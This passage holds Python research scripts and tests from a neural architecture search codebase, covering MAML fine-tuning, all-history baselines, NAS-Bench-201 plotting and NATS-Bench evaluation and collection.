train_results["score"], metric.get_info()["score"]
)
)
logger.log(log_str)
logger.log("")
per_timestamp_time.update(time.time() - start_time)
start_time = time.time()
logger.log("-" * 200 + "\n")
logger.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser("Use the maml.")
parser.add_argument(
"--save_dir",
type=str,
default="./outputs/GeMOSA-synthetic/use-maml-ft",
help="The checkpoint directory.",
)
parser.add_argument(
"--env_version",
type=str,
required=True,
help="The synthetic enviornment version.",
)
parser.add_argument(
"--hidden_dim",
type=int,
default=16,
help="The hidden dimension.",
)
parser.add_argument(
"--meta_lr",
type=float,
default=0.02,
help="The learning rate for the MAML optimizer (default is Adam)",
)
parser.add_argument(
"--inner_lr",
type=float,
default=0.005,
help="The learning rate for the inner optimization",
)
parser.add_argument(
"--inner_step", type=int, default=1, help="The inner loop steps for MAML."
)
parser.add_argument(
"--seq_length", type=int, default=20, help="The sequence length."
)
parser.add_argument(
"--meta_batch",
type=int,
default=256,
help="The batch size for the meta-model",
)
parser.add_argument(
"--epochs",
type=int,
default=2000,
help="The total number of epochs.",
)
parser.add_argument(
"--early_stop_thresh",
type=int,
default=50,
help="The maximum epochs for early stop.",
)
parser.add_argument(
"--device",
type=str,
default="cpu",
help="",
)
parser.add_argument(
"--workers",
type=int,
default=4,
help="The number of data loading workers (default: 4)",
)
# Random Seed
parser.add_argument("--rand_seed", type=int, default=-1, help="manual seed")
args = parser.parse_args()
if args.rand_seed is None or args.rand_seed < 0:
args.rand_seed = random.randint(1, 100000)
assert args.save_dir is not None, "The save dir argument can not be None"
args.save_dir = "{:}-s{:}-mlr{:}-d{:}-e{:}-env{:}".format(
args.save_dir,
args.inner_step,
args.meta_lr,
args.hidden_dim,
args.epochs,
args.env_version,
)
main(args)
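# Hedged usage sketch (added; the --env_version value is illustrative only):
#   python maml-ft.py --env_version v1 --device cpu --epochs 200
# Meta-training samples --meta_batch random timestamps per step, keeps the checkpoint
# with the lowest meta-loss, and the meta-test loop then adapts per test timestamp via
# finetune()/MAML.adapt() before scoring.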
```
#### File: experimental/GeMOSA/basic-his.py
```python
import sys, time, copy, torch, random, argparse
from tqdm import tqdm
from copy import deepcopy
from xautodl.procedures import (
prepare_seed,
prepare_logger,
save_checkpoint,
copy_checkpoint,
)
from xautodl.log_utils import time_string
from xautodl.log_utils import AverageMeter, convert_secs2time
from xautodl.utils import split_str2indexes
from xautodl.procedures.advanced_main import basic_train_fn, basic_eval_fn
from xautodl.procedures.metric_utils import SaveMetric, MSEMetric, ComposeMetric
from xautodl.datasets.synthetic_core import get_synthetic_env
from xautodl.models.xcore import get_model
from lfna_utils import lfna_setup
def subsample(historical_x, historical_y, maxn=10000):
total = historical_x.size(0)
if total <= maxn:
return historical_x, historical_y
else:
indexes = torch.randint(low=0, high=total, size=[maxn])
return historical_x[indexes], historical_y[indexes]
def main(args):
logger, env_info, model_kwargs = lfna_setup(args)
# check indexes to be evaluated
to_evaluate_indexes = split_str2indexes(args.srange, env_info["total"], None)
logger.log(
"Evaluate {:}, which has {:} timestamps in total.".format(
args.srange, len(to_evaluate_indexes)
)
)
w_container_per_epoch = dict()
per_timestamp_time, start_time = AverageMeter(), time.time()
for i, idx in enumerate(to_evaluate_indexes):
need_time = "Time Left: {:}".format(
convert_secs2time(
per_timestamp_time.avg * (len(to_evaluate_indexes) - i), True
)
)
logger.log(
"[{:}]".format(time_string())
+ " [{:04d}/{:04d}][{:04d}]".format(i, len(to_evaluate_indexes), idx)
+ " "
+ need_time
)
# train the same data
assert idx != 0
historical_x, historical_y = [], []
for past_i in range(idx):
historical_x.append(env_info["{:}-x".format(past_i)])
historical_y.append(env_info["{:}-y".format(past_i)])
historical_x, historical_y = torch.cat(historical_x), torch.cat(historical_y)
historical_x, historical_y = subsample(historical_x, historical_y)
# build model
model = get_model(dict(model_type="simple_mlp"), **model_kwargs)
# build optimizer
optimizer = torch.optim.Adam(model.parameters(), lr=args.init_lr, amsgrad=True)
criterion = torch.nn.MSELoss()
lr_scheduler = torch.optim.lr_scheduler.MultiStepLR(
optimizer,
milestones=[
int(args.epochs * 0.25),
int(args.epochs * 0.5),
int(args.epochs * 0.75),
],
gamma=0.3,
)
train_metric = MSEMetric()
best_loss, best_param = None, None
for _iepoch in range(args.epochs):
preds = model(historical_x)
optimizer.zero_grad()
loss = criterion(preds, historical_y)
loss.backward()
optimizer.step()
lr_scheduler.step()
# save best
if best_loss is None or best_loss > loss.item():
best_loss = loss.item()
best_param = copy.deepcopy(model.state_dict())
model.load_state_dict(best_param)
with torch.no_grad():
train_metric(preds, historical_y)
train_results = train_metric.get_info()
metric = ComposeMetric(MSEMetric(), SaveMetric())
eval_dataset = torch.utils.data.TensorDataset(
env_info["{:}-x".format(idx)], env_info["{:}-y".format(idx)]
)
eval_loader = torch.utils.data.DataLoader(
eval_dataset, batch_size=args.batch_size, shuffle=False, num_workers=0
)
results = basic_eval_fn(eval_loader, model, metric, logger)
log_str = (
"[{:}]".format(time_string())
+ " [{:04d}/{:04d}]".format(idx, env_info["total"])
+ " train-mse: {:.5f}, eval-mse: {:.5f}".format(
train_results["mse"], results["mse"]
)
)
logger.log(log_str)
save_path = logger.path(None) / "{:04d}-{:04d}.pth".format(
idx, env_info["total"]
)
w_container_per_epoch[idx] = model.get_w_container().no_grad_clone()
save_checkpoint(
{
"model_state_dict": model.state_dict(),
"model": model,
"index": idx,
"timestamp": env_info["{:}-timestamp".format(idx)],
},
save_path,
logger,
)
logger.log("")
per_timestamp_time.update(time.time() - start_time)
start_time = time.time()
save_checkpoint(
{"w_container_per_epoch": w_container_per_epoch},
logger.path(None) / "final-ckp.pth",
logger,
)
logger.log("-" * 200 + "\n")
logger.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser("Use all the past data to train.")
parser.add_argument(
"--save_dir",
type=str,
default="./outputs/lfna-synthetic/use-all-past-data",
help="The checkpoint directory.",
)
parser.add_argument(
"--env_version",
type=str,
required=True,
help="The synthetic enviornment version.",
)
parser.add_argument(
"--hidden_dim",
type=int,
required=True,
help="The hidden dimension.",
)
parser.add_argument(
"--init_lr",
type=float,
default=0.1,
help="The initial learning rate for the optimizer (default is Adam)",
)
parser.add_argument(
"--batch_size",
type=int,
default=512,
help="The batch size",
)
parser.add_argument(
"--epochs",
type=int,
default=1000,
help="The total number of epochs.",
)
parser.add_argument(
"--srange", type=str, required=True, help="The range of models to be evaluated"
)
parser.add_argument(
"--workers",
type=int,
default=4,
help="The number of data loading workers (default: 4)",
)
# Random Seed
parser.add_argument("--rand_seed", type=int, default=-1, help="manual seed")
args = parser.parse_args()
if args.rand_seed is None or args.rand_seed < 0:
args.rand_seed = random.randint(1, 100000)
assert args.save_dir is not None, "The save dir argument can not be None"
args.save_dir = "{:}-{:}-d{:}".format(
args.save_dir, args.env_version, args.hidden_dim
)
main(args)
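# Hedged usage sketch (added; argument values are illustrative only):
#   python basic-his.py --env_version v1 --hidden_dim 16 --srange 1-100
# For each timestamp index in --srange, a fresh "simple_mlp" is trained on all earlier
# timestamps (subsampled to at most 10k points) and then evaluated on that timestamp.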
```
#### File: exps/experimental/test-nas-plot.py
```python
import os, sys, random
from pathlib import Path
from copy import deepcopy
import torch
import numpy as np
from collections import OrderedDict
lib_dir = (Path(__file__).parent / ".." / ".." / "lib").resolve()
if str(lib_dir) not in sys.path:
sys.path.insert(0, str(lib_dir))
from nas_201_api import NASBench201API as API
def test_nas_api():
from nas_201_api import ArchResults
xdata = torch.load(
"/home/dxy/FOR-RELEASE/NAS-Projects/output/NAS-BENCH-201-4/simplifies/architectures/000157-FULL.pth"
)
for key in ["full", "less"]:
print("\n------------------------- {:} -------------------------".format(key))
archRes = ArchResults.create_from_state_dict(xdata[key])
print(archRes)
print(archRes.arch_idx_str())
print(archRes.get_dataset_names())
print(archRes.get_comput_costs("cifar10-valid"))
# get the metrics
print(archRes.get_metrics("cifar10-valid", "x-valid", None, False))
print(archRes.get_metrics("cifar10-valid", "x-valid", None, True))
print(archRes.query("cifar10-valid", 777))
OPS = ["skip-connect", "conv-1x1", "conv-3x3", "pool-3x3"]
COLORS = ["chartreuse", "cyan", "navyblue", "chocolate1"]
def plot(filename):
from graphviz import Digraph
g = Digraph(
format="png",
edge_attr=dict(fontsize="20", fontname="times"),
node_attr=dict(
style="filled",
shape="rect",
align="center",
fontsize="20",
height="0.5",
width="0.5",
penwidth="2",
fontname="times",
),
engine="dot",
)
g.body.extend(["rankdir=LR"])
steps = 5
for i in range(0, steps):
if i == 0:
g.node(str(i), fillcolor="darkseagreen2")
elif i + 1 == steps:
g.node(str(i), fillcolor="palegoldenrod")
else:
g.node(str(i), fillcolor="lightblue")
for i in range(1, steps):
for xin in range(i):
op_i = random.randint(0, len(OPS) - 1)
# g.edge(str(xin), str(i), label=OPS[op_i], fillcolor=COLORS[op_i])
g.edge(
str(xin),
str(i),
label=OPS[op_i],
color=COLORS[op_i],
fillcolor=COLORS[op_i],
)
# import pdb; pdb.set_trace()
g.render(filename, cleanup=True, view=False)
def test_auto_grad():
class Net(torch.nn.Module):
def __init__(self, iS):
super(Net, self).__init__()
self.layer = torch.nn.Linear(iS, 1)
def forward(self, inputs):
outputs = self.layer(inputs)
outputs = torch.exp(outputs)
return outputs.mean()
net = Net(10)
inputs = torch.rand(256, 10)
loss = net(inputs)
first_order_grads = torch.autograd.grad(
loss, net.parameters(), retain_graph=True, create_graph=True
)
first_order_grads = torch.cat([x.view(-1) for x in first_order_grads])
second_order_grads = []
for grads in first_order_grads:
s_grads = torch.autograd.grad(grads, net.parameters())
second_order_grads.append(s_grads)
def test_one_shot_model(ckpath, use_train):
from models import get_cell_based_tiny_net, get_search_spaces
from datasets import get_datasets, SearchDataset
from config_utils import load_config, dict2config
from utils.nas_utils import evaluate_one_shot
use_train = int(use_train) > 0
# ckpath = 'output/search-cell-nas-bench-201/DARTS-V1-cifar10/checkpoint/seed-11416-basic.pth'
# ckpath = 'output/search-cell-nas-bench-201/DARTS-V1-cifar10/checkpoint/seed-28640-basic.pth'
print("ckpath : {:}".format(ckpath))
ckp = torch.load(ckpath)
xargs = ckp["args"]
train_data, valid_data, xshape, class_num = get_datasets(
xargs.dataset, xargs.data_path, -1
)
# config = load_config(xargs.config_path, {'class_num': class_num, 'xshape': xshape}, None)
config = load_config(
"./configs/nas-benchmark/algos/DARTS.config",
{"class_num": class_num, "xshape": xshape},
None,
)
if xargs.dataset == "cifar10":
cifar_split = load_config("configs/nas-benchmark/cifar-split.txt", None, None)
xvalid_data = deepcopy(train_data)
xvalid_data.transform = valid_data.transform
valid_loader = torch.utils.data.DataLoader(
xvalid_data,
batch_size=2048,
sampler=torch.utils.data.sampler.SubsetRandomSampler(cifar_split.valid),
num_workers=12,
pin_memory=True,
)
else:
raise ValueError("invalid dataset : {:}".format(xargs.dataseet))
search_space = get_search_spaces("cell", xargs.search_space_name)
model_config = dict2config(
{
"name": "SETN",
"C": xargs.channel,
"N": xargs.num_cells,
"max_nodes": xargs.max_nodes,
"num_classes": class_num,
"space": search_space,
"affine": False,
"track_running_stats": True,
},
None,
)
search_model = get_cell_based_tiny_net(model_config)
search_model.load_state_dict(ckp["search_model"])
search_model = search_model.cuda()
api = API("/home/dxy/.torch/NAS-Bench-201-v1_0-e61699.pth")
archs, probs, accuracies = evaluate_one_shot(
search_model, valid_loader, api, use_train
)
if __name__ == "__main__":
# test_nas_api()
# for i in range(200): plot('{:04d}'.format(i))
# test_auto_grad()
test_one_shot_model(sys.argv[1], sys.argv[2])
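# Added note: the script expects a one-shot search checkpoint path and a 0/1 use_train
# flag, e.g. (path taken from the commented examples above):
#   python test-nas-plot.py output/search-cell-nas-bench-201/DARTS-V1-cifar10/checkpoint/seed-11416-basic.pth 0
# The NAS-Bench-201 benchmark file path inside test_one_shot_model is hard-coded and
# would need to be edited for a local setup.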
```
#### File: exps/NATS-Bench/main-sss.py
```python
import os, sys, time, torch, argparse
from typing import List, Text, Dict, Any
from PIL import ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
from copy import deepcopy
from pathlib import Path
from xautodl.config_utils import dict2config, load_config
from xautodl.procedures import bench_evaluate_for_seed
from xautodl.procedures import get_machine_info
from xautodl.datasets import get_datasets
from xautodl.log_utils import Logger, AverageMeter, time_string, convert_secs2time
from xautodl.utils import split_str2indexes
def evaluate_all_datasets(
channels: Text,
datasets: List[Text],
xpaths: List[Text],
splits: List[Text],
config_path: Text,
seed: int,
workers: int,
logger,
):
machine_info = get_machine_info()
all_infos = {"info": machine_info}
all_dataset_keys = []
    # iterate over all the datasets
for dataset, xpath, split in zip(datasets, xpaths, splits):
# the train and valid data
train_data, valid_data, xshape, class_num = get_datasets(dataset, xpath, -1)
# load the configuration
if dataset == "cifar10" or dataset == "cifar100":
split_info = load_config(
"configs/nas-benchmark/cifar-split.txt", None, None
)
elif dataset.startswith("ImageNet16"):
split_info = load_config(
"configs/nas-benchmark/{:}-split.txt".format(dataset), None, None
)
else:
raise ValueError("invalid dataset : {:}".format(dataset))
config = load_config(
config_path, dict(class_num=class_num, xshape=xshape), logger
)
# check whether use the splitted validation set
if bool(split):
assert dataset == "cifar10"
ValLoaders = {
"ori-test": torch.utils.data.DataLoader(
valid_data,
batch_size=config.batch_size,
shuffle=False,
num_workers=workers,
pin_memory=True,
)
}
assert len(train_data) == len(split_info.train) + len(
split_info.valid
), "invalid length : {:} vs {:} + {:}".format(
len(train_data), len(split_info.train), len(split_info.valid)
)
train_data_v2 = deepcopy(train_data)
train_data_v2.transform = valid_data.transform
valid_data = train_data_v2
# data loader
train_loader = torch.utils.data.DataLoader(
train_data,
batch_size=config.batch_size,
sampler=torch.utils.data.sampler.SubsetRandomSampler(split_info.train),
num_workers=workers,
pin_memory=True,
)
valid_loader = torch.utils.data.DataLoader(
valid_data,
batch_size=config.batch_size,
sampler=torch.utils.data.sampler.SubsetRandomSampler(split_info.valid),
num_workers=workers,
pin_memory=True,
)
ValLoaders["x-valid"] = valid_loader
else:
# data loader
train_loader = torch.utils.data.DataLoader(
train_data,
batch_size=config.batch_size,
shuffle=True,
num_workers=workers,
pin_memory=True,
)
valid_loader = torch.utils.data.DataLoader(
valid_data,
batch_size=config.batch_size,
shuffle=False,
num_workers=workers,
pin_memory=True,
)
if dataset == "cifar10":
ValLoaders = {"ori-test": valid_loader}
elif dataset == "cifar100":
cifar100_splits = load_config(
"configs/nas-benchmark/cifar100-test-split.txt", None, None
)
ValLoaders = {
"ori-test": valid_loader,
"x-valid": torch.utils.data.DataLoader(
valid_data,
batch_size=config.batch_size,
sampler=torch.utils.data.sampler.SubsetRandomSampler(
cifar100_splits.xvalid
),
num_workers=workers,
pin_memory=True,
),
"x-test": torch.utils.data.DataLoader(
valid_data,
batch_size=config.batch_size,
sampler=torch.utils.data.sampler.SubsetRandomSampler(
cifar100_splits.xtest
),
num_workers=workers,
pin_memory=True,
),
}
elif dataset == "ImageNet16-120":
imagenet16_splits = load_config(
"configs/nas-benchmark/imagenet-16-120-test-split.txt", None, None
)
ValLoaders = {
"ori-test": valid_loader,
"x-valid": torch.utils.data.DataLoader(
valid_data,
batch_size=config.batch_size,
sampler=torch.utils.data.sampler.SubsetRandomSampler(
imagenet16_splits.xvalid
),
num_workers=workers,
pin_memory=True,
),
"x-test": torch.utils.data.DataLoader(
valid_data,
batch_size=config.batch_size,
sampler=torch.utils.data.sampler.SubsetRandomSampler(
imagenet16_splits.xtest
),
num_workers=workers,
pin_memory=True,
),
}
else:
raise ValueError("invalid dataset : {:}".format(dataset))
dataset_key = "{:}".format(dataset)
if bool(split):
dataset_key = dataset_key + "-valid"
logger.log(
"Evaluate ||||||| {:10s} ||||||| Train-Num={:}, Valid-Num={:}, Train-Loader-Num={:}, Valid-Loader-Num={:}, batch size={:}".format(
dataset_key,
len(train_data),
len(valid_data),
len(train_loader),
len(valid_loader),
config.batch_size,
)
)
logger.log(
"Evaluate ||||||| {:10s} ||||||| Config={:}".format(dataset_key, config)
)
for key, value in ValLoaders.items():
logger.log(
"Evaluate ---->>>> {:10s} with {:} batchs".format(key, len(value))
)
# arch-index= 9930, arch=|nor_conv_3x3~0|+|nor_conv_3x3~0|nor_conv_3x3~1|+|skip_connect~0|nor_conv_3x3~1|nor_conv_3x3~2|
# this genotype is the architecture with the highest accuracy on CIFAR-100 validation set
genotype = "|nor_conv_3x3~0|+|nor_conv_3x3~0|nor_conv_3x3~1|+|skip_connect~0|nor_conv_3x3~1|nor_conv_3x3~2|"
arch_config = dict2config(
dict(
name="infer.shape.tiny",
channels=channels,
genotype=genotype,
num_classes=class_num,
),
None,
)
results = bench_evaluate_for_seed(
arch_config, config, train_loader, ValLoaders, seed, logger
)
all_infos[dataset_key] = results
all_dataset_keys.append(dataset_key)
all_infos["all_dataset_keys"] = all_dataset_keys
return all_infos
def main(
save_dir: Path,
workers: int,
datasets: List[Text],
xpaths: List[Text],
splits: List[int],
seeds: List[int],
nets: List[str],
opt_config: Dict[Text, Any],
to_evaluate_indexes: tuple,
cover_mode: bool,
):
log_dir = save_dir / "logs"
log_dir.mkdir(parents=True, exist_ok=True)
logger = Logger(str(log_dir), os.getpid(), False)
logger.log("xargs : seeds = {:}".format(seeds))
logger.log("xargs : cover_mode = {:}".format(cover_mode))
logger.log("-" * 100)
logger.log(
"Start evaluating range =: {:06d} - {:06d}".format(
min(to_evaluate_indexes), max(to_evaluate_indexes)
)
+ "({:} in total) / {:06d} with cover-mode={:}".format(
len(to_evaluate_indexes), len(nets), cover_mode
)
)
for i, (dataset, xpath, split) in enumerate(zip(datasets, xpaths, splits)):
logger.log(
"--->>> Evaluate {:}/{:} : dataset={:9s}, path={:}, split={:}".format(
i, len(datasets), dataset, xpath, split
)
)
logger.log("--->>> optimization config : {:}".format(opt_config))
start_time, epoch_time = time.time(), AverageMeter()
for i, index in enumerate(to_evaluate_indexes):
channelstr = nets[index]
logger.log(
"\n{:} evaluate {:06d}/{:06d} ({:06d}/{:06d})-th arch [seeds={:}] {:}".format(
time_string(),
i,
len(to_evaluate_indexes),
index,
len(nets),
seeds,
"-" * 15,
)
)
logger.log("{:} {:} {:}".format("-" * 15, channelstr, "-" * 15))
# test this arch on different datasets with different seeds
has_continue = False
for seed in seeds:
to_save_name = save_dir / "arch-{:06d}-seed-{:04d}.pth".format(index, seed)
if to_save_name.exists():
if cover_mode:
logger.log(
"Find existing file : {:}, remove it before evaluation".format(
to_save_name
)
)
os.remove(str(to_save_name))
else:
logger.log(
"Find existing file : {:}, skip this evaluation".format(
to_save_name
)
)
has_continue = True
continue
results = evaluate_all_datasets(
channelstr, datasets, xpaths, splits, opt_config, seed, workers, logger
)
torch.save(results, to_save_name)
logger.log(
"\n{:} evaluate {:06d}/{:06d} ({:06d}/{:06d})-th arch [seeds={:}] ===>>> {:}".format(
time_string(),
i,
len(to_evaluate_indexes),
index,
len(nets),
seeds,
to_save_name,
)
)
# measure elapsed time
if not has_continue:
epoch_time.update(time.time() - start_time)
start_time = time.time()
need_time = "Time Left: {:}".format(
convert_secs2time(epoch_time.avg * (len(to_evaluate_indexes) - i - 1), True)
)
logger.log(
"This arch costs : {:}".format(convert_secs2time(epoch_time.val, True))
)
logger.log("{:}".format("*" * 100))
logger.log(
"{:} {:74s} {:}".format(
"*" * 10,
"{:06d}/{:06d} ({:06d}/{:06d})-th done, left {:}".format(
i, len(to_evaluate_indexes), index, len(nets), need_time
),
"*" * 10,
)
)
logger.log("{:}".format("*" * 100))
logger.close()
def traverse_net(candidates: List[int], N: int):
nets = [""]
for i in range(N):
new_nets = []
for net in nets:
for C in candidates:
new_nets.append(str(C) if net == "" else "{:}:{:}".format(net, C))
nets = new_nets
return nets
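# Added note: traverse_net enumerates every per-layer channel combination as a
# colon-joined string, e.g. traverse_net([8, 16], 2) -> ["8:8", "8:16", "16:8", "16:16"],
# so len(nets) == len(candidates) ** N, which is what --check_N verifies below.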
def filter_indexes(xlist, mode, save_dir, seeds):
all_indexes = []
for index in xlist:
if mode == "cover":
all_indexes.append(index)
else:
for seed in seeds:
temp_path = save_dir / "arch-{:06d}-seed-{:04d}.pth".format(index, seed)
if not temp_path.exists():
all_indexes.append(index)
break
print(
"{:} [FILTER-INDEXES] : there are {:}/{:} architectures in total".format(
time_string(), len(all_indexes), len(xlist)
)
)
SLURM_PROCID, SLURM_NTASKS = "SLURM_PROCID", "SLURM_NTASKS"
if SLURM_PROCID in os.environ and SLURM_NTASKS in os.environ: # run on the slurm
proc_id, ntasks = int(os.environ[SLURM_PROCID]), int(os.environ[SLURM_NTASKS])
assert 0 <= proc_id < ntasks, "invalid proc_id {:} vs ntasks {:}".format(
proc_id, ntasks
)
scales = [int(float(i) / ntasks * len(all_indexes)) for i in range(ntasks)] + [
len(all_indexes)
]
per_job = []
for i in range(ntasks):
xs, xe = min(max(scales[i], 0), len(all_indexes) - 1), min(
max(scales[i + 1] - 1, 0), len(all_indexes) - 1
)
per_job.append((xs, xe))
for i, srange in enumerate(per_job):
print(" -->> {:2d}/{:02d} : {:}".format(i, ntasks, srange))
current_range = per_job[proc_id]
all_indexes = [
all_indexes[i] for i in range(current_range[0], current_range[1] + 1)
]
# set the device id
device = proc_id % torch.cuda.device_count()
torch.cuda.set_device(device)
print(" set the device id = {:}".format(device))
print(
"{:} [FILTER-INDEXES] : after filtering there are {:} architectures in total".format(
time_string(), len(all_indexes)
)
)
return all_indexes
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="NATS-Bench (size search space)",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser.add_argument(
"--mode",
type=str,
required=True,
choices=["new", "cover"],
help="The script mode.",
)
parser.add_argument(
"--save_dir",
type=str,
default="output/NATS-Bench-size",
help="Folder to save checkpoints and log.",
)
parser.add_argument(
"--candidateC",
type=int,
nargs="+",
default=[8, 16, 24, 32, 40, 48, 56, 64],
help=".",
)
parser.add_argument(
"--num_layers", type=int, default=5, help="The number of layers in a network."
)
parser.add_argument("--check_N", type=int, default=32768, help="For safety.")
# use for train the model
parser.add_argument(
"--workers",
type=int,
default=8,
help="The number of data loading workers (default: 2)",
)
parser.add_argument(
"--srange", type=str, required=True, help="The range of models to be evaluated"
)
parser.add_argument("--datasets", type=str, nargs="+", help="The applied datasets.")
parser.add_argument(
"--xpaths", type=str, nargs="+", help="The root path for this dataset."
)
parser.add_argument(
"--splits", type=int, nargs="+", help="The root path for this dataset."
)
parser.add_argument(
"--hyper",
type=str,
default="12",
choices=["01", "12", "90"],
help="The tag for hyper-parameters.",
)
parser.add_argument(
"--seeds", type=int, nargs="+", help="The range of models to be evaluated"
)
args = parser.parse_args()
nets = traverse_net(args.candidateC, args.num_layers)
if len(nets) != args.check_N:
raise ValueError(
"Pre-num-check failed : {:} vs {:}".format(len(nets), args.check_N)
)
opt_config = "./configs/nas-benchmark/hyper-opts/{:}E.config".format(args.hyper)
if not os.path.isfile(opt_config):
raise ValueError("{:} is not a file.".format(opt_config))
save_dir = Path(args.save_dir) / "raw-data-{:}".format(args.hyper)
save_dir.mkdir(parents=True, exist_ok=True)
to_evaluate_indexes = split_str2indexes(args.srange, args.check_N, 5)
if not len(args.seeds):
raise ValueError("invalid length of seeds args: {:}".format(args.seeds))
if not (len(args.datasets) == len(args.xpaths) == len(args.splits)):
raise ValueError(
"invalid infos : {:} vs {:} vs {:}".format(
len(args.datasets), len(args.xpaths), len(args.splits)
)
)
if args.workers <= 0:
raise ValueError("invalid number of workers : {:}".format(args.workers))
target_indexes = filter_indexes(
to_evaluate_indexes, args.mode, save_dir, args.seeds
)
assert torch.cuda.is_available(), "CUDA is not available."
torch.backends.cudnn.enabled = True
torch.backends.cudnn.deterministic = True
# torch.set_num_threads(args.workers)
main(
save_dir,
args.workers,
args.datasets,
args.xpaths,
args.splits,
tuple(args.seeds),
nets,
opt_config,
target_indexes,
args.mode == "cover",
)
```
#### File: exps/NATS-Bench/tss-collect-patcher.py
```python
import os, re, sys, time, shutil, random, argparse, collections
import numpy as np
from copy import deepcopy
import torch
from tqdm import tqdm
from pathlib import Path
from collections import defaultdict, OrderedDict
from typing import Dict, Any, Text, List
from xautodl.log_utils import AverageMeter, time_string, convert_secs2time
from xautodl.config_utils import load_config, dict2config
from xautodl.datasets import get_datasets
from xautodl.models import CellStructure, get_cell_based_tiny_net, get_search_spaces
from xautodl.procedures import (
bench_pure_evaluate as pure_evaluate,
get_nas_bench_loaders,
)
from xautodl.utils import get_md5_file
from nats_bench import pickle_save, pickle_load, ArchResults, ResultsCount
from nas_201_api import NASBench201API
NATS_TSS_BASE_NAME = "NATS-tss-v1_0" # 2020.08.28
def simplify(save_dir, save_name, nets, total, sup_config):
hps, seeds = ["12", "200"], set()
for hp in hps:
sub_save_dir = save_dir / "raw-data-{:}".format(hp)
ckps = sorted(list(sub_save_dir.glob("arch-*-seed-*.pth")))
seed2names = defaultdict(list)
for ckp in ckps:
            parts = re.split(r"-|\.", ckp.name)
seed2names[parts[3]].append(ckp.name)
print("DIR : {:}".format(sub_save_dir))
nums = []
for seed, xlist in seed2names.items():
seeds.add(seed)
nums.append(len(xlist))
print(" [seed={:}] there are {:} checkpoints.".format(seed, len(xlist)))
assert (
len(nets) == total == max(nums)
), "there are some missed files : {:} vs {:}".format(max(nums), total)
print("{:} start simplify the checkpoint.".format(time_string()))
datasets = ("cifar10-valid", "cifar10", "cifar100", "ImageNet16-120")
# Create the directory to save the processed data
# full_save_dir contains all benchmark files with trained weights.
# simplify_save_dir contains all benchmark files without trained weights.
full_save_dir = save_dir / (save_name + "-FULL")
simple_save_dir = save_dir / (save_name + "-SIMPLIFY")
full_save_dir.mkdir(parents=True, exist_ok=True)
simple_save_dir.mkdir(parents=True, exist_ok=True)
# all data in memory
arch2infos, evaluated_indexes = dict(), set()
end_time, arch_time = time.time(), AverageMeter()
# save the meta information
for index in tqdm(range(total)):
arch_str = nets[index]
hp2info = OrderedDict()
simple_save_path = simple_save_dir / "{:06d}.pickle".format(index)
arch2infos[index] = pickle_load(simple_save_path)
evaluated_indexes.add(index)
# measure elapsed time
arch_time.update(time.time() - end_time)
end_time = time.time()
need_time = "{:}".format(
convert_secs2time(arch_time.avg * (total - index - 1), True)
)
# print('{:} {:06d}/{:06d} : still need {:}'.format(time_string(), index, total, need_time))
print("{:} {:} done.".format(time_string(), save_name))
final_infos = {
"meta_archs": nets,
"total_archs": total,
"arch2infos": arch2infos,
"evaluated_indexes": evaluated_indexes,
}
save_file_name = save_dir / "{:}.pickle".format(save_name)
pickle_save(final_infos, str(save_file_name))
# move the benchmark file to a new path
hd5sum = get_md5_file(str(save_file_name) + ".pbz2")
hd5_file_name = save_dir / "{:}-{:}.pickle.pbz2".format(NATS_TSS_BASE_NAME, hd5sum)
shutil.move(str(save_file_name) + ".pbz2", hd5_file_name)
print(
"Save {:} / {:} architecture results into {:} -> {:}.".format(
len(evaluated_indexes), total, save_file_name, hd5_file_name
)
)
# move the directory to a new path
hd5_full_save_dir = save_dir / "{:}-{:}-full".format(NATS_TSS_BASE_NAME, hd5sum)
hd5_simple_save_dir = save_dir / "{:}-{:}-simple".format(NATS_TSS_BASE_NAME, hd5sum)
shutil.move(full_save_dir, hd5_full_save_dir)
shutil.move(simple_save_dir, hd5_simple_save_dir)
def traverse_net(max_node):
aa_nas_bench_ss = get_search_spaces("cell", "nats-bench")
archs = CellStructure.gen_all(aa_nas_bench_ss, max_node, False)
print(
"There are {:} archs vs {:}.".format(
len(archs), len(aa_nas_bench_ss) ** ((max_node - 1) * max_node / 2)
)
)
random.seed(88) # please do not change this line for reproducibility
random.shuffle(archs)
assert (
archs[0].tostr()
== "|avg_pool_3x3~0|+|nor_conv_1x1~0|skip_connect~1|+|nor_conv_1x1~0|skip_connect~1|skip_connect~2|"
), "please check the 0-th architecture : {:}".format(archs[0])
assert (
archs[9].tostr()
== "|avg_pool_3x3~0|+|none~0|none~1|+|skip_connect~0|none~1|nor_conv_3x3~2|"
), "please check the 9-th architecture : {:}".format(archs[9])
assert (
archs[123].tostr()
== "|avg_pool_3x3~0|+|avg_pool_3x3~0|nor_conv_1x1~1|+|none~0|avg_pool_3x3~1|nor_conv_3x3~2|"
), "please check the 123-th architecture : {:}".format(archs[123])
return [x.tostr() for x in archs]
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="NATS-Bench (topology search space)",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser.add_argument(
"--base_save_dir",
type=str,
default="./output/NATS-Bench-topology",
help="The base-name of folder to save checkpoints and log.",
)
parser.add_argument(
"--max_node", type=int, default=4, help="The maximum node in a cell."
)
parser.add_argument(
"--channel", type=int, default=16, help="The number of channels."
)
parser.add_argument(
"--num_cells", type=int, default=5, help="The number of cells in one stage."
)
parser.add_argument("--check_N", type=int, default=15625, help="For safety.")
parser.add_argument(
"--save_name", type=str, default="process", help="The save directory."
)
args = parser.parse_args()
nets = traverse_net(args.max_node)
if len(nets) != args.check_N:
raise ValueError(
"Pre-num-check failed : {:} vs {:}".format(len(nets), args.check_N)
)
save_dir = Path(args.base_save_dir)
simplify(
save_dir,
args.save_name,
nets,
args.check_N,
{"name": "infer.tiny", "channel": args.channel, "num_cells": args.num_cells},
)
```
#### File: AutoDL-Projects/tests/test_loader.py
```python
import unittest
import tempfile
import torch
from xautodl.datasets import get_datasets
def test_simple():
xdir = tempfile.mkdtemp()
train_data, valid_data, xshape, class_num = get_datasets("cifar10", xdir, -1)
print(train_data)
print(valid_data)
xloader = torch.utils.data.DataLoader(
train_data, batch_size=256, shuffle=True, num_workers=4, pin_memory=True
)
print(xloader)
print(next(iter(xloader)))
for i, data in enumerate(xloader):
print(i)
test_simple()
```
#### File: AutoDL-Projects/tests/test_super_norm.py
```python
import unittest
import torch
from xautodl.xlayers import super_core
from xautodl import spaces
